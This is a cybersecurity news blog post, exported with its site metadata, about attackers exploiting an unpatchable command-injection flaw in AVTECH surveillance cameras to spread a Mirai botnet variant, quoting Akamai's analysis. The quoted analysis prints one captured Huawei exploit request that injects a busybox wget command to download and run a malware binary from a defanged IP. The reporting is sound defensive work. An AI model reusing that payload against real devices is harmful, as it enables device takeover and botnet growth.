{"id":56974,"date":"2024-08-29T13:56:15","date_gmt":"2024-08-29T13:56:15","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/36271\/Unpatchable-Zero-Day-In-Surveillance-Cam-Is-Being-Exploited-To-Install-Mirai.html"},"modified":"2024-08-29T13:56:15","modified_gmt":"2024-08-29T13:56:15","slug":"unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/","title":{"rendered":"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2020\/11\/zeroday-800x534.jpg\" alt=\"The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.\"><figcaption class=\"caption\"><\/figcaption><\/figure>\n<aside id=\"social-left\" class=\"social-left\" aria-label=\"Read the comments or share this article\"> <a class=\"comment-count icon-comment-bubble-down\" href=\"https:\/\/arstechnica.com\/security\/2024\/08\/unpatchable-0-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/?comments=1\"> <\/p>\n<h4 class=\"comment-count-before\">reader comments<\/h4>\n<p> <span class=\"comment-count-number\">52<\/span> <\/a> <\/aside>\n<p> <!-- cache hit 102:single\/related:e5b5c65bd18320c4b245d9297e24f620 --><!-- empty --><\/p>\n<p>Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.<\/p>\n<p>The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai <a href=\"https:\/\/www.akamai.com\/blog\/security-research\/2024-corona-mirai-botnet-infects-zero-day-sirt\">said Wednesday<\/a>. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.<\/p>\n<h2>That time a ragtag army shook the Internet<\/h2>\n<p>Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices <a href=\"https:\/\/arstechnica.com\/information-technology\/2016\/09\/why-the-silencing-of-krebsonsecurity-opens-a-troubling-chapter-for-the-net\/\">took down<\/a> cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on <a href=\"https:\/\/arstechnica.com\/information-technology\/2016\/09\/botnet-of-145k-cameras-reportedly-deliver-internets-biggest-ddos-ever\/\">Internet service providers<\/a> and other targets. One such attack, against dynamic domain name provider Dyn <a href=\"https:\/\/arstechnica.com\/information-technology\/2016\/10\/double-dip-internet-of-things-botnet-attack-felt-across-the-internet\/\">paralyzed<\/a> vast swaths of the Internet.<br \/>\nComplicating attempts to contain Mirai, its creators <a href=\"https:\/\/arstechnica.com\/information-technology\/2016\/10\/brace-yourselves-source-code-powering-potent-iot-ddoses-just-went-public\/\">released the malware<\/a> to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.<\/p>\n<p>Kyle Lefton, a security researcher with Akamai\u2019s Security Intelligence and Response Team, said in an email that it has observed the threat actor behind the attacks perform DDoS attacks against \u201cvarious organizations,\u201d which he didn\u2019t name or describe further. So far, the team hasn\u2019t seen any indication the threat actors are monitoring video feeds or using the infected cameras for other purposes.<\/p>\n<p>Akamai detected the activity using a \u201choneypot\u201d of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn\u2019t allow the researchers to measure the botnet&#8217;s size. The US Cybersecurity and Infrastructure Security Agency <a href=\"https:\/\/www.cisa.gov\/news-events\/ics-advisories\/icsa-24-214-07\">warned<\/a> of the vulnerability earlier this month.<\/p>\n<p>The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019 when <a href=\"https:\/\/github.com\/R00tS3c\/DDOS-RootSec\/blob\/master\/Botnets\/Exploits\/avtech.py\">exploit code<\/a> became public. The zero-day resides in the \u201cbrightness argument in the \u2018action=\u2019 parameter\u201d and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn\u2019t formally recognized until this month, with the publishing of CVE-2024-7029.<\/p>\n<p>Wednesday\u2019s post went on to say:<\/p>\n<blockquote>\n<h2>How does it work?<\/h2>\n<p>This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.<br \/>Decoded payload<\/p>\n<figure class=\"image shortcode-img center large\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-1.jpeg\" class=\"enlarge\" data-height=\"454\" data-width=\"1264\" alt=\"Fig. 1: Decoded payload body of the exploit attempts\"><img loading=\"lazy\" decoding=\"async\" alt=\"Fig. 1: Decoded payload body of the exploit attempts\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-1-640x230.jpeg\" width=\"640\" height=\"230\" srcset=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-1.jpeg 2x\"><\/a><figcaption class=\"caption\">\n<div class=\"caption-text\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-1.jpeg\" class=\"enlarge-link\" data-height=\"454\" data-width=\"1264\">Enlarge<\/a> <span class=\"sep\">\/<\/span> Fig. 1: Decoded payload body of the exploit attempts<\/div>\n<\/figcaption><\/figure>\n<p>Fig. 1: Decoded payload body of the exploit attempts<\/p>\n<p>The vulnerability lies in the brightness function within the file \/cgi-bin\/supervisor\/Factory.cgi (Figure 2).<\/p>\n<figure class=\"image shortcode-img center large\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-2.jpeg\" class=\"enlarge\" data-height=\"275\" data-width=\"1440\" alt=\"Fig. 2: PoC of the exploit\"><img loading=\"lazy\" decoding=\"async\" alt=\"Fig. 2: PoC of the exploit\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-2-640x122.jpeg\" width=\"640\" height=\"122\" srcset=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-2-1280x244.jpeg 2x\"><\/a><figcaption class=\"caption\">\n<div class=\"caption-text\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-2.jpeg\" class=\"enlarge-link\" data-height=\"275\" data-width=\"1440\">Enlarge<\/a> <span class=\"sep\">\/<\/span> Fig. 2: PoC of the exploit<\/div>\n<\/figcaption><\/figure>\n<h2>What could happen?<\/h2>\n<p>In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.<\/p>\n<p>Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.<\/p>\n<figure class=\"image shortcode-img center large\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-3.jpeg\" class=\"enlarge\" data-height=\"368\" data-width=\"1440\" alt=\"Fig. 3: Strings from the JavaScript downloader\"><img loading=\"lazy\" decoding=\"async\" alt=\"Fig. 3: Strings from the JavaScript downloader\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-3-640x164.jpeg\" width=\"640\" height=\"164\" srcset=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-3-1280x327.jpeg 2x\"><\/a><figcaption class=\"caption\">\n<div class=\"caption-text\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-3.jpeg\" class=\"enlarge-link\" data-height=\"368\" data-width=\"1440\">Enlarge<\/a> <span class=\"sep\">\/<\/span> Fig. 3: Strings from the JavaScript downloader<\/div>\n<\/figcaption><\/figure>\n<p>In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.<\/p>\n<p>Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string \u201cCorona\u201d to the console on an infected host (Figure 4).<\/p>\n<figure class=\"image shortcode-img center large\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-4.jpeg\" class=\"enlarge\" data-height=\"150\" data-width=\"1256\" alt=\"Fig. 4: Execution of malware showing output to console\"><img loading=\"lazy\" decoding=\"async\" alt=\"Fig. 4: Execution of malware showing output to console\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-4-640x76.jpeg\" width=\"640\" height=\"76\" srcset=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-4.jpeg 2x\"><\/a><figcaption class=\"caption\">\n<div class=\"caption-text\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2024\/08\/figure-4.jpeg\" class=\"enlarge-link\" data-height=\"150\" data-width=\"1256\">Enlarge<\/a> <span class=\"sep\">\/<\/span> Fig. 4: Execution of malware showing output to console<\/div>\n<\/figcaption><\/figure>\n<p>Static analysis of the strings in the malware samples shows targeting of the path \/ctrlt\/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:<\/p>\n<pre><code>POST \/ctrlt\/DeviceUpgrade_1 HTTP\/1.1 Content-Length: 430 Connection: keep-alive Accept: *\/* Authorization: Digest username=\\\"dslf-config\\\", realm=\\\"HuaweiHomeGateway\\\", nonce=\\\"88645cefb1f9ede0e336e3569d75ee30\\\", uri=\\\"\/ctrlt\/DeviceUpgrade_1\\\", response=\\\"3612f843a42db38f48f59d2a3597e19c\\\", algorithm=\\\"MD5\\\", qop=\\\"auth\\\", nc=00000001, cnonce=\\\"248d1a2560100669\\\" <!--?xml version=\\\"1.0\\\" ?-->$(\/bin\/busybox wget -g 45.14.244[.]89 -l \/tmp\/mips -r \/mips; \/bin\/busybox chmod 777 * \/tmp\/mips; \/tmp\/mips huawei.rep)$(echo HUAWEIUPNP)\n<\/code><\/pre>\n<p>The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.<\/p>\n<\/blockquote>\n<p>Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/36271\/Unpatchable-Zero-Day-In-Surveillance-Cam-Is-Being-Exploited-To-Install-Mirai.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":56975,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[277],"tags":[11028],"class_list":["post-56974","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity-blogs","tag-headlinehackermalwarebotnetflawspyware"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-08-29T13:56:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2020\/11\/zeroday-800x534.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai\",\"datePublished\":\"2024-08-29T13:56:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/\"},\"wordCount\":780,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai.jpg\",\"keywords\":[\"headline,hacker,malware,botnet,flaw,spyware\"],\"articleSection\":[\"CyberSecurity Blogs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/\",\"name\":\"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai.jpg\",\"datePublished\":\"2024-08-29T13:56:15+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/08\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai.jpg\",\"width\":800,\"height\":534},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,hacker,malware,botnet,flaw,spyware\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlinehackermalwarebotnetflawspyware\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/","og_locale":"en_US","og_type":"article","og_title":"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-08-29T13:56:15+00:00","og_image":[{"url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2020\/11\/zeroday-800x534.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai","datePublished":"2024-08-29T13:56:15+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/"},"wordCount":780,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/08\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai.jpg","keywords":["headline,hacker,malware,botnet,flaw,spyware"],"articleSection":["CyberSecurity Blogs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/","url":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/","name":"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/08\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai.jpg","datePublished":"2024-08-29T13:56:15+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/08\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/08\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai.jpg","width":800,"height":534},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/unpatchable-zero-day-in-surveillance-cam-is-being-exploited-to-install-mirai\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,hacker,malware,botnet,flaw,spyware","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlinehackermalwarebotnetflawspyware\/"},{"@type":"ListItem","position":3,"name":"Unpatchable Zero Day In Surveillance Cam Is Being Exploited To Install Mirai"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH 